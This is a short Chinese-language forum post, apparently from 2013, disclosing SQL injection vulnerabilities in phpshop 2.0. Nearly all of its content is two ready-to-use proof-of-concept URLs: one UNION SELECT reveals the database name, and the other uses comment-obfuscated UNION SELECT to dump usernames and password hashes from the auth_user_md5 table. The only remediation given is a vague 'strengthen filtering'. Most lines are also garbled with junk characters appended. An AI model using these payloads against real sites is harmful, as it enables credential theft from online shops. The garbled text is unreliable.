标题 : phpshop 2.0 SQL Injection Vulnerability! y1 R% P D; V# K; S
" h1 C) J( Q; V) S) d/ A5 a- F; ?作者 : By onestree
: b, W; F" ^" J$ d6 B. O, f下载地址 : http://code.google.com/p/phpshop/downloads/list
9 T0 @! s* c* V# W% f3 R测试地址: windows 7 / ubuntu$ C: C: u! a; \/ G
0 T. S u$ Y1 c9 d7 F1 @ * E) ]. E3 y/ P) r; [. @
SQLi p0c:" n* U4 L( P% J' f: z: ^
) T% n# k( ~* ?- m& {==================, ?% y- a* X' H+ B% D
: r" i1 ^+ {( y" R Q& Fhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
5 u! ^. I( z6 U6 F, T( }2 @union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --9 E+ C! @- ?: T5 g/ s$ h
) ?4 @ I3 H7 \
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
T2 q: @2 { N+ }
0 I9 Z' [3 Z/ ~4 E- D修复:
8 D5 w1 w) x, n% O* `, y, H加强过滤; f- l0 {; f5 t' M. k) m$ W
, o) ]* A6 O. v4 t7 d
, p; F1 @; r) y2 f& {8 x3 }
|
发表于 2013-1-18 18:24:10
收藏
支持
反对